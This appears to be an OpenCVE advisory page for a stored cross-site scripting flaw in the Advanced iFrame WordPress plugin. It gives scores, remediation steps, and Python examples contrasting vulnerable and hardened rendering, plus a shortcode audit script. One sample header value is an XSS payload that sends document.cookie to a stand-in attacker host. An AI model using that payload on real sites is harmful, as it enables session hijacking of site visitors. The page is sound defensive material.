Description
The Advanced iFrame plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'advanced_iframe' shortcode in all versions up to, and including, 2024.5 due to insufficient input sanitization and output escaping on user supplied attributes through the 'src' attribute when the src supplied returns a header with an injected value. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
Published: 2025-03-26
Score: 6.4 Medium
EPSS: < 1% Very Low
KEV: No
Impact: Stored Cross‑Site Scripting (XSS)
Action: Apply Patch
AI Analysis

Impact

The Advanced iFrame plugin for WordPress lets an authenticated user with the contributor role or higher place an 'advanced_iframe' shortcode whose 'src' attribute points at a host the attacker controls. When that src is requested and its response carries a header with an injected value, the plugin writes the header value into the generated page without sanitizing or escaping it, so markup or script carried in the header becomes part of the rendered output. The shortcode persists in the stored post, and the script runs in the browser of every user who views the page. The resulting stored XSS can be used for session hijacking, phishing, or defacement; the CVSS vector rates the loss of confidentiality and integrity as limited (C:L/I:L) with no availability impact.
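The pattern described above, modelled in Python as an added illustration (the plugin itself is PHP and this is not its code). It assumes the plugin fetches the shortcode's src server-side and writes one response header value into the iframe markup; the advisory does not name the header, so 'X-Frame-Title' is a placeholder, and the response headers are constructed, not captured. The vulnerable renderer concatenates the raw value; the hardened one restricts src to an allowlist of hosts and escapes for the attribute context, two controls that work independently.

```python
import html
from urllib.parse import urlsplit

# Constructed response headers, as an attacker-controlled src host could return them.
# The header name is a placeholder: the advisory does not say which header is reflected.
# The payload closes the title attribute and the iframe, then opens a script tag;
# content left inside <iframe>...</iframe> would not execute, so the iframe is closed first.
ATTACKER_HEADERS = {
    "Content-Type": "text/html",
    "X-Frame-Title": '"></iframe><script>new Image().src="https://evil.example/c?"+document.cookie</script>',
}


def render_vulnerable(src, headers):
    """Bug class on the page: the fetched header value is concatenated into an
    attribute with no escaping, so a value containing '">' ends the attribute
    and whatever follows is parsed as markup."""
    title = headers.get("X-Frame-Title", "")
    return f'<iframe src="{src}" title="{title}"></iframe>'


def render_hardened(src, headers, allowed_hosts):
    """Refuse src hosts outside an allowlist (limits who can supply headers at all)
    and escape the reflected value for the HTML attribute context (neutralises
    whatever a permitted host returns)."""
    parts = urlsplit(src)
    host = (parts.hostname or "").lower()
    if parts.scheme not in ("http", "https") or host not in allowed_hosts:
        raise ValueError(f"src host not allowed: {parts.hostname!r}")
    title = html.escape(headers.get("X-Frame-Title", ""), quote=True)
    return f'<iframe src="{html.escape(src, quote=True)}" title="{title}"></iframe>'


def contains_script_tag(markup):
    """A literal <script start tag in the output means the attribute boundary was broken."""
    return "<script" in markup.lower()


if __name__ == "__main__":
    print(render_vulnerable("https://evil.example/page", ATTACKER_HEADERS))
    print(render_hardened("https://intranet.example.org/page", ATTACKER_HEADERS, {"intranet.example.org"}))
```

html.escape with quote=True is the right primitive only because the value lands inside a double-quoted attribute; a value reflected into a script block or a URL would need context-specific encoding instead, which is why the host allowlist is kept as a second control.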

Affected Systems

All installations of Advanced iFrame, a WordPress plugin developed by mdempfle (tracked under the vendor name Tinywebgallery in the CPE data below), with versions up to and including 2024.5 are affected. The flaw is exploitable on any site where users with contributor privileges or greater can place the plugin's shortcode in content.

Risk and Exploitability

The CVSS 3.1 score of 6.4 (AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N) indicates medium severity: the attack is network-reachable, low in complexity and needs no user interaction beyond viewing the page, but it requires a low-privilege authenticated account; the changed scope reflects that the impact lands in other users' browsers rather than in the plugin itself. The EPSS score below 1 % and the absence of the CVE from the CISA KEV catalog indicate little observed exploitation at the time of writing. The attacker must hold contributor-level access or higher and must control the host behind the src URL so that its response carries the injected header value, which the plugin then reflects into the page. Because the shortcode is stored in post content, the payload is delivered to every visitor who renders the page; a contributor cannot publish on their own, so the editor or administrator who previews the submitted post is likely the first to render it. The attack is practical wherever the plugin is in active use.

Generated by OpenCVE AI on April 22, 2026 at 01:47 UTC.

Remediation

No vendor fix or workaround currently provided.

OpenCVE Recommended Actions

  • Upgrade the Advanced iFrame plugin to a release later than 2024.5. The description scopes the flaw to versions up to and including 2024.5, but the Remediation field above records no vendor fix, so confirm the fixed version in the vendor changelog before relying on the upgrade.
  • Grant the contributor role and higher only to trusted users, and remove it where the shortcode is not required for that user group.
  • Re-validate existing posts that use the advanced_iframe shortcode and confirm that every src points at a host you control or trust; strip any that do not. The script is not in the post content but in the response from the src host, so search for the shortcode and its src value, not for script tags.
  • If the functionality is not needed, disable the Advanced iFrame shortcode in the plugin settings, or restrict its use to administrators only.
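An audit helper for the re-validation step above, added here as an example and not part of the plugin or of OpenCVE. It scans post content for advanced_iframe shortcodes, parses their attributes with a simplified form of WordPress's shortcode attribute syntax (double-quoted, single-quoted and bare values), and reports every shortcode whose src is missing, not an absolute URL, or hosted outside an allowlist. The sample rows and the allowlist are constructed; the column names mirror wp_posts so the function can be fed rows pulled from the database.

```python
import re
from urllib.parse import urlsplit

# Matches the opening tag of the shortcode and captures its attribute string.
# Attribute values containing ']' are not supported by this simplified form.
SHORTCODE_RE = re.compile(r"\[advanced_iframe\b([^\]]*)\]", re.IGNORECASE)
# key="v" | key='v' | key=v, the three value forms WordPress's shortcode_parse_atts accepts.
ATTR_RE = re.compile(r"""([\w-]+)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s"'\]]+))""")


def parse_atts(raw):
    """Return {name: value} for the named attributes in a shortcode attribute string."""
    atts = {}
    for m in ATTR_RE.finditer(raw):
        name = m.group(1).lower()
        atts[name] = next(v for v in m.groups()[1:] if v is not None)
    return atts


def audit_posts(posts, allowed_hosts):
    """posts: iterable of dicts with 'ID', 'post_author' and 'post_content'.
    Returns one finding per shortcode whose src needs review: no src at all,
    a relative or malformed src, or a host not in allowed_hosts."""
    findings = []
    for post in posts:
        for sc in SHORTCODE_RE.finditer(post["post_content"]):
            src = parse_atts(sc.group(1)).get("src")
            if src is None:
                reason = "no src attribute"
            else:
                host = urlsplit(src).hostname
                if host is None:
                    reason = "relative or malformed src"
                elif host.lower() not in allowed_hosts:
                    reason = f"external host {host}"
                else:
                    continue  # absolute URL on an allowed host: nothing to report
            findings.append({"ID": post["ID"], "author": post["post_author"], "src": src, "reason": reason})
    return findings


# Constructed sample rows shaped like wp_posts columns (not real site data).
SAMPLE_POSTS = [
    {"ID": 10, "post_author": 2,
     "post_content": '<p>Docs</p>[advanced_iframe src="https://intranet.example.org/map" width="100%"]'},
    {"ID": 11, "post_author": 7,
     "post_content": "[advanced_iframe src='http://203.0.113.9/evil' height=400]"},
    {"ID": 12, "post_author": 7,
     "post_content": '[advanced_iframe id="x"] and [advanced_iframe src=/local/path]'},
    {"ID": 13, "post_author": 3, "post_content": "No shortcode here."},
]
ALLOWED_HOSTS = frozenset({"intranet.example.org"})

if __name__ == "__main__":
    for finding in audit_posts(SAMPLE_POSTS, ALLOWED_HOSTS):
        print(finding)
```

Rows for a live site can be pulled with a query such as SELECT ID, post_author, post_content FROM wp_posts WHERE post_content LIKE '%[advanced_iframe%' (adjust the table prefix). The scan covers post content only; shortcodes placed in widgets, post meta or page-builder fields need a separate pass over those tables.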


Advisories
Source: EUVD
ID: EUVD-2025-8128
Title: The Advanced iFrame plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'advanced_iframe' shortcode in all versions up to, and including, 2024.5 due to insufficient input sanitization and output escaping on user supplied attributes through the 'src' attribute when the src supplied returns a header with an injected value. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
History

Tue, 15 Jul 2025 13:45:00 +0000

Type: Metrics (epss)
  Removed: {'score': 0.00038}
  Added: {'score': 0.00034}

Mon, 14 Jul 2025 16:45:00 +0000

Type: First Time appeared
  Added: Tinywebgallery; Tinywebgallery advanced Iframe
Type: CPEs
  Added: cpe:2.3:a:tinywebgallery:advanced_iframe:*:*:*:*:*:wordpress:*:*
Type: Vendors & Products
  Added: Tinywebgallery; Tinywebgallery advanced Iframe

Wed, 26 Mar 2025 14:15:00 +0000

Type: Metrics (ssvc)
  Added: {'options': {'Automatable': 'no', 'Exploitation': 'none', 'Technical Impact': 'partial'}, 'version': '2.0.3'}

Wed, 26 Mar 2025 09:45:00 +0000

Type: Description
  Added: The Advanced iFrame plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'advanced_iframe' shortcode in all versions up to, and including, 2024.5 due to insufficient input sanitization and output escaping on user supplied attributes through the 'src' attribute when the src supplied returns a header with an injected value. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
Type: Title
  Added: Advanced iFrame <= 2024.5 - Authenticated (Contributor+) Stored Cross-Site Scripting via Host Header
Type: Weaknesses
  Added: CWE-79
Type: References
Type: Metrics (cvssV3_1)
  Added: {'score': 6.4, 'vector': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N'}


MITRE

Status: PUBLISHED

Assigner: Wordfence

Published:

Updated: 2026-04-08T16:55:13.699Z

Reserved: 2025-02-18T15:21:12.917Z

Link: CVE-2025-1439

Vulnrichment

Updated: 2025-03-26T13:41:16.069Z

NVD

Status : Analyzed

Published: 2025-03-26T10:15:15.093

Modified: 2025-07-14T16:38:27.070

Link: CVE-2025-1439

cve-icon Redhat

No data.

OpenCVE Enrichment

Updated: 2026-04-22T02:00:05Z

Weaknesses